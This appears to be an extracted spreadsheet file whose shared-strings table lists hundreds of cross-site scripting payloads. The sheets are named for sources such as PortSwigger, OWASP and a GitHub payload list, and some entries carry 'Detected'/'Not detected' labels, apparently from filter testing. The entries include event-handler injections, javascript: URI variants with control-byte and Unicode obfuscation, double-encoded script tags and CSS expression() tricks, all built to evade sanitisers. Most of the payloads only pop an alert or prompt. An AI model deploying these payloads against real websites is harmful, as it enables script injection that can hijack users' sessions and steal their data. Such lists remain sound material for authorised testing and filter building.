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XSS Payload From Github" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="Port Swagger XSS payloads" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="Tiny-XSS-Payloads" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="Polyglot" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="XSS Payload Twitter Feed" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="Angular Payload" sheetId="6" r:id="rId9"/>
    <sheet state="visible" name="OSWAP XSS Payload" sheetId="7" r:id="rId10"/>
    <sheet state="visible" name="New Sheet" sheetId="8" r:id="rId11"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3179" uniqueCount="1783">
  <si>
    <t>XSS Payloads</t>
  </si>
  <si>
    <t>Encoded Form</t>
  </si>
  <si>
    <t>-prompt(8)-</t>
  </si>
  <si>
    <t>-prompt(8)-'</t>
  </si>
  <si>
    <t>Acknowledgment</t>
  </si>
  <si>
    <t>;a=prompt,a()//';a=prompt,a()//'-eval(window['pro'%2B'mpt'](8)")-'</t>
  </si>
  <si>
    <t>https://github.com/payloadbox/xss-payload-list</t>
  </si>
  <si>
    <t>-eval(window['pro'%2B'mpt'](8)")-"</t>
  </si>
  <si>
    <t>onclick=prompt(8)&gt;@x.y</t>
  </si>
  <si>
    <t>onclick=prompt(8)&gt;&lt;svg/onload=prompt(8)&gt;@x.y</t>
  </si>
  <si>
    <t>&lt;!-- Project Name  : Cross Site Scripting ( XSS ) Vulnerability Payload List --&gt;</t>
  </si>
  <si>
    <t>&lt;image/src/onerror=prompt(8)&gt;</t>
  </si>
  <si>
    <t>&lt;!--        Author : Ismail Tasdelen --&gt;</t>
  </si>
  <si>
    <t>&lt;img/src/onerror=prompt(8)&gt;</t>
  </si>
  <si>
    <t>&lt;!--      Linkedin : https://www.linkedin.com/in/ismailtasdelen/ --&gt;</t>
  </si>
  <si>
    <t>&lt;image src/onerror=prompt(8)&gt;</t>
  </si>
  <si>
    <t>&lt;!--        GitHub : https://github.com/ismailtasdelen/ --&gt;</t>
  </si>
  <si>
    <t>&lt;img src/onerror=prompt(8)&gt;</t>
  </si>
  <si>
    <t>&lt;!--       Twitter : https://twitter.com/ismailtsdln --&gt;</t>
  </si>
  <si>
    <t>&lt;image src =q onerror=prompt(8)&gt;</t>
  </si>
  <si>
    <t>&lt;!--        Medium : https://medium.com/@ismailtasdelen --&gt;</t>
  </si>
  <si>
    <t>&lt;img src =q onerror=prompt(8)&gt;</t>
  </si>
  <si>
    <t>&lt;/scrip&lt;/script&gt;t&gt;&lt;img src =q onerror=prompt(8)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Detected </t>
  </si>
  <si>
    <t>&lt;script\x20type="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Not detected </t>
  </si>
  <si>
    <t>&lt;script\x3Etype="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x0Dtype="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x09type="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x0Ctype="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x2Ftype="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script\x0Atype="text/javascript"&gt;javascript:alert(1);&lt;/script&gt;</t>
  </si>
  <si>
    <t>`"&gt;&lt;\x3Cscript&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>`"&gt;&lt;\x00script&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;img src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;audio src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;video src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;body src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;image src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;object src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;script src=1 href=1 onerror="javascript:alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;svg onResize svg onResize="javascript:javascript:alert(1)"&gt;&lt;/svg onResize&gt;</t>
  </si>
  <si>
    <t>&lt;title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"&gt;&lt;/title onPropertyChange&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onLoad iframe onLoad="javascript:javascript:alert(1)"&gt;&lt;/iframe onLoad&gt;</t>
  </si>
  <si>
    <t>&lt;body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"&gt;&lt;/body onMouseEnter&gt;</t>
  </si>
  <si>
    <t>&lt;body onFocus body onFocus="javascript:javascript:alert(1)"&gt;&lt;/body onFocus&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onScroll frameset onScroll="javascript:javascript:alert(1)"&gt;&lt;/frameset onScroll&gt;</t>
  </si>
  <si>
    <t>&lt;script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"&gt;&lt;/script onReadyStateChange&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseUp html onMouseUp="javascript:javascript:alert(1)"&gt;&lt;/html onMouseUp&gt;</t>
  </si>
  <si>
    <t>&lt;body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"&gt;&lt;/body onPropertyChange&gt;</t>
  </si>
  <si>
    <t>&lt;svg onLoad svg onLoad="javascript:javascript:alert(1)"&gt;&lt;/svg onLoad&gt;</t>
  </si>
  <si>
    <t>&lt;body onPageHide body onPageHide="javascript:javascript:alert(1)"&gt;&lt;/body onPageHide&gt;</t>
  </si>
  <si>
    <t>&lt;body onMouseOver body onMouseOver="javascript:javascript:alert(1)"&gt;&lt;/body onMouseOver&gt;</t>
  </si>
  <si>
    <t>&lt;body onUnload body onUnload="javascript:javascript:alert(1)"&gt;&lt;/body onUnload&gt;</t>
  </si>
  <si>
    <t>&lt;body onLoad body onLoad="javascript:javascript:alert(1)"&gt;&lt;/body onLoad&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"&gt;&lt;/bgsound onPropertyChange&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"&gt;&lt;/html onMouseLeave&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"&gt;&lt;/html onMouseWheel&gt;</t>
  </si>
  <si>
    <t>&lt;style onLoad style onLoad="javascript:javascript:alert(1)"&gt;&lt;/style onLoad&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"&gt;&lt;/iframe onReadyStateChange&gt;</t>
  </si>
  <si>
    <t>&lt;body onPageShow body onPageShow="javascript:javascript:alert(1)"&gt;&lt;/body onPageShow&gt;</t>
  </si>
  <si>
    <t>&lt;style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"&gt;&lt;/style onReadyStateChange&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onFocus frameset onFocus="javascript:javascript:alert(1)"&gt;&lt;/frameset onFocus&gt;</t>
  </si>
  <si>
    <t>&lt;applet onError applet onError="javascript:javascript:alert(1)"&gt;&lt;/applet onError&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onStart marquee onStart="javascript:javascript:alert(1)"&gt;&lt;/marquee onStart&gt;</t>
  </si>
  <si>
    <t>&lt;script onLoad script onLoad="javascript:javascript:alert(1)"&gt;&lt;/script onLoad&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseOver html onMouseOver="javascript:javascript:alert(1)"&gt;&lt;/html onMouseOver&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"&gt;&lt;/html onMouseEnter&gt;</t>
  </si>
  <si>
    <t>&lt;body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"&gt;&lt;/body onBeforeUnload&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseDown html onMouseDown="javascript:javascript:alert(1)"&gt;&lt;/html onMouseDown&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onScroll marquee onScroll="javascript:javascript:alert(1)"&gt;&lt;/marquee onScroll&gt;</t>
  </si>
  <si>
    <t>&lt;xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"&gt;&lt;/xml onPropertyChange&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onBlur frameset onBlur="javascript:javascript:alert(1)"&gt;&lt;/frameset onBlur&gt;</t>
  </si>
  <si>
    <t>&lt;applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"&gt;&lt;/applet onReadyStateChange&gt;</t>
  </si>
  <si>
    <t>&lt;svg onUnload svg onUnload="javascript:javascript:alert(1)"&gt;&lt;/svg onUnload&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseOut html onMouseOut="javascript:javascript:alert(1)"&gt;&lt;/html onMouseOut&gt;</t>
  </si>
  <si>
    <t>&lt;body onMouseMove body onMouseMove="javascript:javascript:alert(1)"&gt;&lt;/body onMouseMove&gt;</t>
  </si>
  <si>
    <t>&lt;body onResize body onResize="javascript:javascript:alert(1)"&gt;&lt;/body onResize&gt;</t>
  </si>
  <si>
    <t>&lt;object onError object onError="javascript:javascript:alert(1)"&gt;&lt;/object onError&gt;</t>
  </si>
  <si>
    <t>&lt;body onPopState body onPopState="javascript:javascript:alert(1)"&gt;&lt;/body onPopState&gt;</t>
  </si>
  <si>
    <t>&lt;html onMouseMove html onMouseMove="javascript:javascript:alert(1)"&gt;&lt;/html onMouseMove&gt;</t>
  </si>
  <si>
    <t>&lt;applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"&gt;&lt;/applet onreadystatechange&gt;</t>
  </si>
  <si>
    <t>&lt;body onpagehide body onpagehide="javascript:javascript:alert(1)"&gt;&lt;/body onpagehide&gt;</t>
  </si>
  <si>
    <t>&lt;svg onunload svg onunload="javascript:javascript:alert(1)"&gt;&lt;/svg onunload&gt;</t>
  </si>
  <si>
    <t>&lt;applet onerror applet onerror="javascript:javascript:alert(1)"&gt;&lt;/applet onerror&gt;</t>
  </si>
  <si>
    <t>&lt;body onkeyup body onkeyup="javascript:javascript:alert(1)"&gt;&lt;/body onkeyup&gt;</t>
  </si>
  <si>
    <t>&lt;body onunload body onunload="javascript:javascript:alert(1)"&gt;&lt;/body onunload&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onload iframe onload="javascript:javascript:alert(1)"&gt;&lt;/iframe onload&gt;</t>
  </si>
  <si>
    <t>&lt;body onload body onload="javascript:javascript:alert(1)"&gt;&lt;/body onload&gt;</t>
  </si>
  <si>
    <t>&lt;html onmouseover html onmouseover="javascript:javascript:alert(1)"&gt;&lt;/html onmouseover&gt;</t>
  </si>
  <si>
    <t>&lt;object onbeforeload object onbeforeload="javascript:javascript:alert(1)"&gt;&lt;/object onbeforeload&gt;</t>
  </si>
  <si>
    <t>&lt;body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"&gt;&lt;/body onbeforeunload&gt;</t>
  </si>
  <si>
    <t>&lt;body onfocus body onfocus="javascript:javascript:alert(1)"&gt;&lt;/body onfocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onkeydown body onkeydown="javascript:javascript:alert(1)"&gt;&lt;/body onkeydown&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"&gt;&lt;/iframe onbeforeload&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src iframe src="javascript:javascript:alert(1)"&gt;&lt;/iframe src&gt;</t>
  </si>
  <si>
    <t>&lt;svg onload svg onload="javascript:javascript:alert(1)"&gt;&lt;/svg onload&gt;</t>
  </si>
  <si>
    <t>&lt;html onmousemove html onmousemove="javascript:javascript:alert(1)"&gt;&lt;/html onmousemove&gt;</t>
  </si>
  <si>
    <t>&lt;body onblur body onblur="javascript:javascript:alert(1)"&gt;&lt;/body onblur&gt;</t>
  </si>
  <si>
    <t>\x3Cscript&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>"`&gt;&lt;script&gt;/* *\x2Fjavascript:alert(1)// */&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;javascript:alert(1)&lt;/script\x0D</t>
  </si>
  <si>
    <t>&lt;script&gt;javascript:alert(1)&lt;/script\x0A</t>
  </si>
  <si>
    <t>&lt;script&gt;javascript:alert(1)&lt;/script\x0B</t>
  </si>
  <si>
    <t>&lt;script charset="\x22&gt;javascript:alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;!--\x3E&lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;</t>
  </si>
  <si>
    <t>--&gt;&lt;!-- ---&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;</t>
  </si>
  <si>
    <t>--&gt;&lt;!-- --\x00&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;</t>
  </si>
  <si>
    <t>--&gt;&lt;!-- --\x21&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;</t>
  </si>
  <si>
    <t>--&gt;&lt;!-- --\x3E&gt; &lt;img src=xxx:x onerror=javascript:alert(1)&gt; --&gt;</t>
  </si>
  <si>
    <t>`"'&gt;&lt;img src='#\x27 onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>`&gt;&lt;p&gt;&lt;svg&gt;&lt;script&gt;a='hello\x27;javascript:alert(1)//';&lt;/script&gt;&lt;/p&gt;&lt;a href=javas\x00cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;/* *\x2A/javascript:alert(1)// */&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;/* *\x00/javascript:alert(1)// */&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;/style\x3E&lt;img src="about:blank" onerror=javascript:alert(1)//&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;/style\x0D&lt;img src="about:blank" onerror=javascript:alert(1)//&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;/style\x09&lt;img src="about:blank" onerror=javascript:alert(1)//&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;/style\x20&lt;img src="about:blank" onerror=javascript:alert(1)//&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;/style\x0A&lt;img src="about:blank" onerror=javascript:alert(1)//&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>`&gt;ABC&lt;div style=font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';"&gt;DEF</t>
  </si>
  <si>
    <t>`&gt;ABC&lt;div style=font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';"&gt;DEF</t>
  </si>
  <si>
    <t>%253Cscript%253Ealert('XSS')%253C%252Fscript%253E</t>
  </si>
  <si>
    <t>&lt;script&gt;if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}&lt;/script&gt;</t>
  </si>
  <si>
    <t>`&gt;&lt;\x3Cimg src=xxx:x onerror=javascript:alert(1)&gt;'`&gt;&lt;\x00img src=xxx:x onerror=javascript:alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;script src="data:text/plain\x2Cjavascript:alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script src="data:\xD4\x8F,javascript:alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script src="data:\xE0\xA4\x98,javascript:alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script src="data:\xCB\x8F,javascript:alert(1)"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>ABC&lt;div style="x\x3Aexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:expression\x5C(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:expression\x00(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:exp\x00ression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:exp\x5Cression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\x0Aexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\x09expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE3\x80\x80expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x84expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xC2\xA0expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x80expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\x0Dexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\x0Cexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x87expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\x20expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x88expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\x00expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x86expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x85expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x82expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\x0Bexpression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x81expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x83expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>ABC&lt;div style="x:\xE2\x80\x89expression(javascript:alert(1)"&gt;DEF</t>
  </si>
  <si>
    <t>&lt;a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x05javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x18javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x11javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x17javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x03javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x00javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x10javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x20javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x13javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x09javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x14javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x19javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x07javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x04javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x01javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x08javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x12javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x15javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x16javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x02javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x06javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javascript\x00:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javascript\x09:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
